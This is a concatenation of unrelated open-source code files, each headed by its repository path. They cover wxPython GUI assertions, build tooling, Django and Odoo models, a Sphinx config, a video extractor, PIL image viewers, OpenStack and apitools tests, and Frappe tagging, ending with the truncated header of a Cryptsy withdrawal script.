isinstance(self.longitude, wx.TextCtrl)
isinstance(self.addLoc, wx.Button)
isinstance(self.remLoc, wx.Button)
isinstance(self.clearSel, wx.Button)
isinstance(self.locSplit, wx.SplitterWindow)
# Cache Day Tab
isinstance(self.cacheday, wx.Panel)
isinstance(self.addCacheDay, wx.Button)
isinstance(self.remCacheDay, wx.Button)
isinstance(self.btnRenameCacheDay, wx.Button)
isinstance(self.upCache, wx.BitmapButton)
isinstance(self.downCache, wx.BitmapButton)
isinstance(self.addCache, wx.BitmapButton)
isinstance(self.remCache, wx.BitmapButton)
isinstance(self.cacheDays, wx.ListCtrl)
isinstance(self.cachesForDay, wx.ListCtrl)
isinstance(self.availCaches, wx.ListCtrl)
# Accounts Tab
isinstance(self.acctTabSplit, wx.SplitterWindow)
isinstance(self.accountNames, wx.ListCtrl)
isinstance(self.btnAddAcount, wx.Button)
isinstance(self.btnRemAccount, wx.Button)
isinstance(self.acctType, wx.ComboBox)
isinstance(self.acctUsername, wx.TextCtrl)
isinstance(self.acctPassword, wx.TextCtrl)
isinstance(self.acctIsTeam, wx.CheckBox)
isinstance(self.acctIsPremium, wx.CheckBox)
isinstance(self.btnSaveAccount, wx.Button)
# GUI Preferences Tab
isinstance(self.guiPreferences, wx.Panel)
isinstance(self.colOrderList, wx.ListCtrl)
isinstance(self.colMoveUpButton, wx.Button)
isinstance(self.colMoveDownButton, wx.Button)
|
0-wiz-0/audacity
|
refs/heads/master
|
lib-src/lv2/suil/waflib/Tools/icpc.py
|
330
|
#! /usr/bin/env python
# encoding: utf-8
# WARNING! Do not edit! http://waf.googlecode.com/git/docs/wafbook/single.html#_obtaining_the_waf_file
import os,sys
from waflib.Tools import ccroot,ar,gxx
from waflib.Configure import conf
@conf
def find_icpc(conf):
if sys.platform=='cygwin':
conf.fatal('The Intel compiler does not work on Cygwin')
v=conf.env
cxx=None
if v['CXX']:cxx=v['CXX']
elif'CXX'in conf.environ:cxx=conf.environ['CXX']
if not cxx:cxx=conf.find_program('icpc',var='CXX')
if not cxx:conf.fatal('Intel C++ Compiler (icpc) was not found')
cxx=conf.cmd_to_list(cxx)
conf.get_cc_version(cxx,icc=True)
v['CXX']=cxx
v['CXX_NAME']='icc'
def configure(conf):
conf.find_icpc()
conf.find_ar()
conf.gxx_common_flags()
conf.gxx_modifier_platform()
conf.cxx_load_tools()
conf.cxx_add_flags()
conf.link_add_flags()
|
proversity-org/edx-platform
|
refs/heads/master
|
openedx/core/djangoapps/credentials/admin.py
|
11
|
"""
Django admin pages for credentials support models.
"""
from config_models.admin import ConfigurationModelAdmin
from django.contrib import admin
from openedx.core.djangoapps.credentials.models import CredentialsApiConfig
class CredentialsApiConfigAdmin(ConfigurationModelAdmin): # pylint: disable=missing-docstring
pass
admin.site.register(CredentialsApiConfig, CredentialsApiConfigAdmin)
|
caot/intellij-community
|
refs/heads/master
|
python/testData/quickFixes/PyMakeMethodStaticQuickFixTest/noSelf_after.py
|
249
|
__author__ = 'ktisha'
class Child(Base):
def __init__(self):
super(Child, self).__init__()
@staticmethod
def f():
test = 1
|
ephes/ml_jobcontrol
|
refs/heads/master
|
ml_jobcontrol/ml_jobcontrol/models.py
|
1
|
# -*- encoding: utf-8 -*-
# Standard library imports
import logging
# Imports from core django
from django.db import models
# Imports from third party apps
from model_utils import Choices
from model_utils.models import StatusModel
from model_utils.models import TimeStampedModel
# Local imports
logger = logging.getLogger(__name__)
class MLDataSet(TimeStampedModel):
name = models.CharField(max_length=100, unique=True)
data_url = models.URLField(unique=True)
owner = models.ForeignKey('auth.User', related_name='mldatasets',
null=True, default=None)
class MLClassificationTestSet(TimeStampedModel):
mldataset = models.ForeignKey(MLDataSet)
train_num = models.IntegerField()
test_num = models.IntegerField()
owner = models.ForeignKey('auth.User',
related_name='mlclassificationtestsets', null=True, default=None)
class MLModel(TimeStampedModel):
name = models.CharField(max_length=100)
import_path = models.CharField(max_length=100, unique=True)
owner = models.ForeignKey('auth.User', related_name='mlmodels',
null=True, default=None)
class MLModelConfig(models.Model):
created = models.DateTimeField(auto_now_add=True)
mlmodel = models.ForeignKey(MLModel, related_name='mlmodelconfigs')
json_config = models.TextField(unique=True)
class MLScore(TimeStampedModel):
name = models.CharField(max_length=100, unique=True)
class MLJob(StatusModel, TimeStampedModel):
STATUS = Choices('todo', 'in_progress', 'done')
mlmodel_config = models.ForeignKey(MLModelConfig)
mlclassification_testset = models.ForeignKey(MLClassificationTestSet)
class MLResultScore(models.Model):
mljob = models.ForeignKey(MLJob, related_name='scores')
mlscore = models.ForeignKey(MLScore)
score = models.FloatField()
|
samokspv/json-schema
|
refs/heads/master
|
docs/conf.py
|
74
|
# -*- coding: utf-8 -*-
#
# JsonSchema documentation build configuration file, created by
# sphinx-quickstart on Sat Dec 10 15:34:44 2011.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys, os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = []
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'JsonSchema'
copyright = u'2011, Justin Rainbow, Bruno Prieto Reis'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '1.0.0'
# The full version, including alpha/beta/rc tags.
release = '1.0.0'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'JsonSchemadoc'
# -- Options for LaTeX output --------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'JsonSchema.tex', u'JsonSchema Documentation',
u'Justin Rainbow, Bruno Prieto Reis', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'jsonschema', u'JsonSchema Documentation',
[u'Justin Rainbow, Bruno Prieto Reis'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output ------------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'JsonSchema', u'JsonSchema Documentation', u'Justin Rainbow, Bruno Prieto Reis',
'JsonSchema', 'One line description of project.', 'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
|
stannynuytkens/youtube-dl
|
refs/heads/master
|
youtube_dl/extractor/tf1.py
|
10
|
# coding: utf-8
from __future__ import unicode_literals
from .common import InfoExtractor
class TF1IE(InfoExtractor):
"""TF1 uses the wat.tv player."""
_VALID_URL = r'https?://(?:(?:videos|www|lci)\.tf1|(?:www\.)?(?:tfou|ushuaiatv|histoire|tvbreizh))\.fr/(?:[^/]+/)*(?P<id>[^/?#.]+)'
_TESTS = [{
'url': 'http://videos.tf1.fr/auto-moto/citroen-grand-c4-picasso-2013-presentation-officielle-8062060.html',
'info_dict': {
'id': '10635995',
'ext': 'mp4',
'title': 'Citroën Grand C4 Picasso 2013 : présentation officielle',
'description': 'Vidéo officielle du nouveau Citroën Grand C4 Picasso, lancé à l\'automne 2013.',
},
'params': {
# Sometimes wat serves the whole file with the --test option
'skip_download': True,
},
'expected_warnings': ['HTTP Error 404'],
}, {
'url': 'http://www.tfou.fr/chuggington/videos/le-grand-mysterioso-chuggington-7085291-739.html',
'info_dict': {
'id': 'le-grand-mysterioso-chuggington-7085291-739',
'ext': 'mp4',
'title': 'Le grand Mystérioso - Chuggington',
'description': 'Le grand Mystérioso - Emery rêve qu\'un article lui soit consacré dans le journal.',
'upload_date': '20150103',
},
'params': {
# Sometimes wat serves the whole file with the --test option
'skip_download': True,
},
'skip': 'HTTP Error 410: Gone',
}, {
'url': 'http://www.tf1.fr/tf1/koh-lanta/videos/replay-koh-lanta-22-mai-2015.html',
'only_matching': True,
}, {
'url': 'http://lci.tf1.fr/sept-a-huit/videos/sept-a-huit-du-24-mai-2015-8611550.html',
'only_matching': True,
}, {
'url': 'http://www.tf1.fr/hd1/documentaire/videos/mylene-farmer-d-une-icone.html',
'only_matching': True,
}]
def _real_extract(self, url):
video_id = self._match_id(url)
webpage = self._download_webpage(url, video_id)
wat_id = self._html_search_regex(
r'(["\'])(?:https?:)?//www\.wat\.tv/embedframe/.*?(?P<id>\d{8})\1',
webpage, 'wat id', group='id')
return self.url_result('wat:%s' % wat_id, 'Wat')
|
glovebx/odoo
|
refs/heads/8.0
|
addons/product/partner.py
|
385
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import fields, osv
class res_partner(osv.osv):
_name = 'res.partner'
_inherit = 'res.partner'
_columns = {
'property_product_pricelist': fields.property(
type='many2one',
relation='product.pricelist',
domain=[('type','=','sale')],
string="Sale Pricelist",
help="This pricelist will be used, instead of the default one, for sales to the current partner"),
}
def _commercial_fields(self, cr, uid, context=None):
return super(res_partner, self)._commercial_fields(cr, uid, context=context) + ['property_product_pricelist']
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
paulormart/gae-project-skeleton-100
|
refs/heads/master
|
gae/lib/PIL/ImageShow.py
|
39
|
#
# The Python Imaging Library.
# $Id$
#
# im.show() drivers
#
# History:
# 2008-04-06 fl Created
#
# Copyright (c) Secret Labs AB 2008.
#
# See the README file for information on usage and redistribution.
#
import Image
import os, sys
_viewers = []
def register(viewer, order=1):
try:
if issubclass(viewer, Viewer):
viewer = viewer()
except TypeError:
pass # raised if viewer wasn't a class
if order > 0:
_viewers.append(viewer)
elif order < 0:
_viewers.insert(0, viewer)
##
# Displays a given image.
#
# @param image An image object.
# @param title Optional title. Not all viewers can display the title.
# @param **options Additional viewer options.
# @return True if a suitable viewer was found, false otherwise.
def show(image, title=None, **options):
for viewer in _viewers:
if viewer.show(image, title=title, **options):
return 1
return 0
##
# Base class for viewers.
class Viewer:
# main api
def show(self, image, **options):
# save temporary image to disk
if image.mode[:4] == "I;16":
# @PIL88 @PIL101
# "I;16" isn't an 'official' mode, but we still want to
# provide a simple way to show 16-bit images.
base = "L"
# FIXME: auto-contrast if max() > 255?
else:
base = Image.getmodebase(image.mode)
if base != image.mode and image.mode != "1":
image = image.convert(base)
self.show_image(image, **options)
# hook methods
format = None
def get_format(self, image):
# return format name, or None to save as PGM/PPM
return self.format
def get_command(self, file, **options):
raise NotImplementedError
def save_image(self, image):
# save to temporary file, and return filename
return image._dump(format=self.get_format(image))
def show_image(self, image, **options):
# display given image
return self.show_file(self.save_image(image), **options)
def show_file(self, file, **options):
# display given file
os.system(self.get_command(file, **options))
return 1
# --------------------------------------------------------------------
if sys.platform == "win32":
class WindowsViewer(Viewer):
format = "BMP"
def get_command(self, file, **options):
return "start /wait %s && del /f %s" % (file, file)
register(WindowsViewer)
elif sys.platform == "darwin":
class MacViewer(Viewer):
format = "BMP"
def get_command(self, file, **options):
# on darwin open returns immediately resulting in the temp
# file removal while app is opening
command = "open -a /Applications/Preview.app"
command = "(%s %s; sleep 20; rm -f %s)&" % (command, file, file)
return command
register(MacViewer)
else:
# unixoids
def which(executable):
path = os.environ.get("PATH")
if not path:
return None
for dirname in path.split(os.pathsep):
filename = os.path.join(dirname, executable)
if os.path.isfile(filename):
# FIXME: make sure it's executable
return filename
return None
class UnixViewer(Viewer):
def show_file(self, file, **options):
command, executable = self.get_command_ex(file, **options)
command = "(%s %s; rm -f %s)&" % (command, file, file)
os.system(command)
return 1
# implementations
class DisplayViewer(UnixViewer):
def get_command_ex(self, file, **options):
command = executable = "display"
return command, executable
if which("display"):
register(DisplayViewer)
class XVViewer(UnixViewer):
def get_command_ex(self, file, title=None, **options):
# note: xv is pretty outdated. most modern systems have
# imagemagick's display command instead.
command = executable = "xv"
if title:
# FIXME: do full escaping
command = command + " -name \"%s\"" % title
return command, executable
if which("xv"):
register(XVViewer)
if __name__ == "__main__":
# usage: python ImageShow.py imagefile [title]
print show(Image.open(sys.argv[1]), *sys.argv[2:])
|
viggates/nova
|
refs/heads/master
|
nova/tests/api/openstack/compute/plugins/v3/test_consoles.py
|
27
|
# Copyright 2010-2011 OpenStack Foundation
# Copyright 2011 Piston Cloud Computing, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import datetime
import uuid as stdlib_uuid
import webob
from nova.api.openstack.compute.plugins.v3 import consoles
from nova.compute import vm_states
from nova import console
from nova import db
from nova import exception
from nova.openstack.common import timeutils
from nova import test
from nova.tests.api.openstack import fakes
from nova.tests import matchers
FAKE_UUID = 'aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa'
class FakeInstanceDB(object):
def __init__(self):
self.instances_by_id = {}
self.ids_by_uuid = {}
self.max_id = 0
def return_server_by_id(self, context, id):
if id not in self.instances_by_id:
self._add_server(id=id)
return dict(self.instances_by_id[id])
def return_server_by_uuid(self, context, uuid):
if uuid not in self.ids_by_uuid:
self._add_server(uuid=uuid)
return dict(self.instances_by_id[self.ids_by_uuid[uuid]])
def _add_server(self, id=None, uuid=None):
if id is None:
id = self.max_id + 1
if uuid is None:
uuid = str(stdlib_uuid.uuid4())
instance = stub_instance(id, uuid=uuid)
self.instances_by_id[id] = instance
self.ids_by_uuid[uuid] = id
if id > self.max_id:
self.max_id = id
def stub_instance(id, user_id='fake', project_id='fake', host=None,
vm_state=None, task_state=None,
reservation_id="", uuid=FAKE_UUID, image_ref="10",
flavor_id="1", name=None, key_name='',
access_ipv4=None, access_ipv6=None, progress=0):
if host is not None:
host = str(host)
if key_name:
key_data = 'FAKE'
else:
key_data = ''
# ReservationID isn't sent back, hack it in there.
server_name = name or "server%s" % id
if reservation_id != "":
server_name = "reservation_%s" % (reservation_id, )
instance = {
"id": int(id),
"created_at": datetime.datetime(2010, 10, 10, 12, 0, 0),
"updated_at": datetime.datetime(2010, 11, 11, 11, 0, 0),
"admin_password": "",
"user_id": user_id,
"project_id": project_id,
"image_ref": image_ref,
"kernel_id": "",
"ramdisk_id": "",
"launch_index": 0,
"key_name": key_name,
"key_data": key_data,
"vm_state": vm_state or vm_states.BUILDING,
"task_state": task_state,
"memory_mb": 0,
"vcpus": 0,
"root_gb": 0,
"hostname": "",
"host": host,
"instance_type": {},
"user_data": "",
"reservation_id": reservation_id,
"mac_address": "",
"scheduled_at": timeutils.utcnow(),
"launched_at": timeutils.utcnow(),
"terminated_at": timeutils.utcnow(),
"availability_zone": "",
"display_name": server_name,
"display_description": "",
"locked": False,
"metadata": [],
"access_ip_v4": access_ipv4,
"access_ip_v6": access_ipv6,
"uuid": uuid,
"progress": progress}
return instance
class ConsolesControllerTest(test.NoDBTestCase):
def setUp(self):
super(ConsolesControllerTest, self).setUp()
self.flags(verbose=True)
self.instance_db = FakeInstanceDB()
self.stubs.Set(db, 'instance_get',
self.instance_db.return_server_by_id)
self.stubs.Set(db, 'instance_get_by_uuid',
self.instance_db.return_server_by_uuid)
self.uuid = str(stdlib_uuid.uuid4())
self.url = '/v3/fake/servers/%s/consoles' % self.uuid
self.controller = consoles.ConsolesController()
def test_create_console(self):
def fake_create_console(cons_self, context, instance_id):
self.assertEqual(instance_id, self.uuid)
return {}
self.stubs.Set(console.api.API, 'create_console', fake_create_console)
req = fakes.HTTPRequestV3.blank(self.url)
self.controller.create(req, self.uuid, None)
self.assertEqual(self.controller.create.wsgi_code, 201)
def test_create_console_unknown_instance(self):
def fake_create_console(cons_self, context, instance_id):
raise exception.InstanceNotFound(instance_id=instance_id)
self.stubs.Set(console.api.API, 'create_console', fake_create_console)
req = fakes.HTTPRequestV3.blank(self.url)
self.assertRaises(webob.exc.HTTPNotFound, self.controller.create,
req, self.uuid, None)
def test_show_console(self):
def fake_get_console(cons_self, context, instance_id, console_id):
self.assertEqual(instance_id, self.uuid)
self.assertEqual(console_id, 20)
pool = dict(console_type='fake_type',
public_hostname='fake_hostname')
return dict(id=console_id, password='fake_password',
port='fake_port', pool=pool, instance_name='inst-0001')
expected = {'console': {'id': 20,
'port': 'fake_port',
'host': 'fake_hostname',
'password': 'fake_password',
'instance_name': 'inst-0001',
'console_type': 'fake_type'}}
self.stubs.Set(console.api.API, 'get_console', fake_get_console)
req = fakes.HTTPRequestV3.blank(self.url + '/20')
res_dict = self.controller.show(req, self.uuid, '20')
self.assertThat(res_dict, matchers.DictMatches(expected))
def test_show_console_unknown_console(self):
def fake_get_console(cons_self, context, instance_id, console_id):
raise exception.ConsoleNotFound(console_id=console_id)
self.stubs.Set(console.api.API, 'get_console', fake_get_console)
req = fakes.HTTPRequestV3.blank(self.url + '/20')
self.assertRaises(webob.exc.HTTPNotFound, self.controller.show,
req, self.uuid, '20')
def test_show_console_unknown_instance(self):
def fake_get_console(cons_self, context, instance_id, console_id):
raise exception.ConsoleNotFoundForInstance(
instance_uuid=instance_id)
self.stubs.Set(console.api.API, 'get_console', fake_get_console)
req = fakes.HTTPRequestV3.blank(self.url + '/20')
self.assertRaises(webob.exc.HTTPNotFound, self.controller.show,
req, self.uuid, '20')
def test_list_consoles(self):
def fake_get_consoles(cons_self, context, instance_id):
self.assertEqual(instance_id, self.uuid)
pool1 = dict(console_type='fake_type',
public_hostname='fake_hostname')
cons1 = dict(id=10, password='fake_password',
port='fake_port', pool=pool1)
pool2 = dict(console_type='fake_type2',
public_hostname='fake_hostname2')
cons2 = dict(id=11, password='fake_password2',
port='fake_port2', pool=pool2)
return [cons1, cons2]
expected = {'consoles':
[{'id': 10, 'console_type': 'fake_type'},
{'id': 11, 'console_type': 'fake_type2'}]}
self.stubs.Set(console.api.API, 'get_consoles', fake_get_consoles)
req = fakes.HTTPRequestV3.blank(self.url)
res_dict = self.controller.index(req, self.uuid)
self.assertThat(res_dict, matchers.DictMatches(expected))
def test_list_consoles_unknown_instance(self):
def fake_get_consoles(cons_self, context, instance_id):
raise exception.InstanceNotFound(instance_id=instance_id)
self.stubs.Set(console.api.API, 'get_consoles', fake_get_consoles)
req = fakes.HTTPRequestV3.blank(self.url)
self.assertRaises(webob.exc.HTTPNotFound, self.controller.index,
req, self.uuid)
def test_delete_console(self):
def fake_get_console(cons_self, context, instance_id, console_id):
self.assertEqual(instance_id, self.uuid)
self.assertEqual(console_id, 20)
pool = dict(console_type='fake_type',
public_hostname='fake_hostname')
return dict(id=console_id, password='fake_password',
port='fake_port', pool=pool)
def fake_delete_console(cons_self, context, instance_id, console_id):
self.assertEqual(instance_id, self.uuid)
self.assertEqual(console_id, 20)
self.stubs.Set(console.api.API, 'get_console', fake_get_console)
self.stubs.Set(console.api.API, 'delete_console', fake_delete_console)
req = fakes.HTTPRequestV3.blank(self.url + '/20')
self.controller.delete(req, self.uuid, '20')
def test_delete_console_unknown_console(self):
def fake_delete_console(cons_self, context, instance_id, console_id):
raise exception.ConsoleNotFound(console_id=console_id)
self.stubs.Set(console.api.API, 'delete_console', fake_delete_console)
req = fakes.HTTPRequestV3.blank(self.url + '/20')
self.assertRaises(webob.exc.HTTPNotFound, self.controller.delete,
req, self.uuid, '20')
def test_delete_console_unknown_instance(self):
def fake_delete_console(cons_self, context, instance_id, console_id):
raise exception.ConsoleNotFoundForInstance(
instance_uuid=instance_id)
self.stubs.Set(console.api.API, 'delete_console', fake_delete_console)
req = fakes.HTTPRequestV3.blank(self.url + '/20')
self.assertRaises(webob.exc.HTTPNotFound, self.controller.delete,
req, self.uuid, '20')
|
SummerLW/Perf-Insight-Report
|
refs/heads/test
|
third_party/gsutil/third_party/apitools/apitools/base/py/credentials_lib_test.py
|
11
|
import re
import mock
import six
from six.moves import http_client
import unittest2
from apitools.base.py import credentials_lib
from apitools.base.py import util
def CreateUriValidator(uri_regexp, content=''):
def CheckUri(uri, headers=None):
if 'X-Google-Metadata-Request' not in headers:
raise ValueError('Missing required header')
if uri_regexp.match(uri):
message = content
status = http_client.OK
else:
message = 'Expected uri matching pattern %s' % uri_regexp.pattern
status = http_client.BAD_REQUEST
return type('HttpResponse', (object,), {'status': status})(), message
return CheckUri
class CredentialsLibTest(unittest2.TestCase):
def _GetServiceCreds(self, service_account_name=None, scopes=None):
kwargs = {}
if service_account_name is not None:
kwargs['service_account_name'] = service_account_name
service_account_name = service_account_name or 'default'
def MockMetadataCalls(request_url):
default_scopes = scopes or ['scope1']
if request_url.endswith('scopes'):
return six.StringIO(''.join(default_scopes))
elif request_url.endswith('service-accounts'):
return six.StringIO(service_account_name)
elif request_url.endswith(
'/service-accounts/%s/token' % service_account_name):
return six.StringIO('{"access_token": "token"}')
self.fail('Unexpected HTTP request to %s' % request_url)
with mock.patch.object(credentials_lib, '_GceMetadataRequest',
side_effect=MockMetadataCalls,
autospec=True) as opener_mock:
with mock.patch.object(util, 'DetectGce',
autospec=True) as mock_detect:
mock_detect.return_value = True
validator = CreateUriValidator(
re.compile(r'.*/%s/.*' % service_account_name),
content='{"access_token": "token"}')
credentials = credentials_lib.GceAssertionCredentials(
scopes, **kwargs)
self.assertIsNone(credentials._refresh(validator))
self.assertEqual(3, opener_mock.call_count)
def testGceServiceAccounts(self):
scopes = ['scope1']
self._GetServiceCreds()
self._GetServiceCreds(scopes=scopes)
self._GetServiceCreds(service_account_name='my_service_account',
scopes=scopes)
class TestGetRunFlowFlags(unittest2.TestCase):
def setUp(self):
self._flags_actual = credentials_lib.FLAGS
def tearDown(self):
credentials_lib.FLAGS = self._flags_actual
def test_with_gflags(self):
HOST = 'myhostname'
PORT = '144169'
class MockFlags(object):
auth_host_name = HOST
auth_host_port = PORT
auth_local_webserver = False
credentials_lib.FLAGS = MockFlags
flags = credentials_lib._GetRunFlowFlags([
'--auth_host_name=%s' % HOST,
'--auth_host_port=%s' % PORT,
'--noauth_local_webserver',
])
self.assertEqual(flags.auth_host_name, HOST)
self.assertEqual(flags.auth_host_port, PORT)
self.assertEqual(flags.logging_level, 'ERROR')
self.assertEqual(flags.noauth_local_webserver, True)
def test_without_gflags(self):
credentials_lib.FLAGS = None
flags = credentials_lib._GetRunFlowFlags([])
self.assertEqual(flags.auth_host_name, 'localhost')
self.assertEqual(flags.auth_host_port, [8080, 8090])
self.assertEqual(flags.logging_level, 'ERROR')
self.assertEqual(flags.noauth_local_webserver, False)
|
rohitw1991/frappe
|
refs/heads/develop
|
frappe/widgets/tags.py
|
36
|
# Copyright (c) 2013, Web Notes Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
from __future__ import unicode_literals
"""
Server side functions for tagging.
- Tags can be added to any record (doctype, name) in the system.
- Items are filtered by tags
- Top tags are shown in the sidebar (?)
- Tags are also identified by the tag_fields property of the DocType
Discussion:
Tags are shown in the docbrowser and ideally where-ever items are searched.
There should also be statistics available for tags (like top tags etc)
Design:
- free tags (user_tags) are stored in __user_tags
- doctype tags are set in tag_fields property of the doctype
- top tags merges the tags from both the lists (only refreshes once an hour (max))
"""
import frappe
def check_user_tags(dt):
"if the user does not have a tags column, then it creates one"
try:
frappe.db.sql("select `_user_tags` from `tab%s` limit 1" % dt)
except Exception, e:
if e.args[0] == 1054:
DocTags(dt).setup()
@frappe.whitelist()
def add_tag():
"adds a new tag to a record, and creates the Tag master"
f = frappe.local.form_dict
tag, color = f.get('tag'), f.get('color')
dt, dn = f.get('dt'), f.get('dn')
DocTags(dt).add(dn, tag)
return tag
@frappe.whitelist()
def remove_tag():
"removes tag from the record"
f = frappe.local.form_dict
tag, dt, dn = f.get('tag'), f.get('dt'), f.get('dn')
DocTags(dt).remove(dn, tag)
class DocTags:
"""Tags for a particular doctype"""
def __init__(self, dt):
self.dt = dt
def get_tag_fields(self):
"""returns tag_fields property"""
return frappe.db.get_value('DocType', self.dt, 'tag_fields')
def get_tags(self, dn):
"""returns tag for a particular item"""
return (frappe.db.get_value(self.dt, dn, '_user_tags', ignore=1) or '').strip()
def add(self, dn, tag):
"""add a new user tag"""
tl = self.get_tags(dn).split(',')
if not tag in tl:
tl.append(tag)
self.update(dn, tl)
def remove(self, dn, tag):
"""remove a user tag"""
tl = self.get_tags(dn).split(',')
self.update(dn, filter(lambda x:x!=tag, tl))
def remove_all(self, dn):
"""remove all user tags (call before delete)"""
self.update(dn, [])
def update(self, dn, tl):
"""updates the _user_tag column in the table"""
if not tl:
tags = ''
else:
tl = list(set(filter(lambda x: x, tl)))
tags = ',' + ','.join(tl)
try:
frappe.db.sql("update `tab%s` set _user_tags=%s where name=%s" % \
(self.dt,'%s','%s'), (tags , dn))
except Exception, e:
if e.args[0]==1054:
if not tags:
# no tags, nothing to do
return
self.setup()
self.update(dn, tl)
else: raise
def setup(self):
"""adds the _user_tags column if not exists"""
from frappe.model.db_schema import add_column
add_column(self.dt, "_user_tags", "Data")
|
salfter/coinswitch
|
refs/heads/master
|
withdraw.py
|
2
|
#!/usr/bin/env python
# coding=iso-8859-1
# Cryptsy auto-withdraw cronjob
#
# Copyright © 2014 Scott Alfter
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
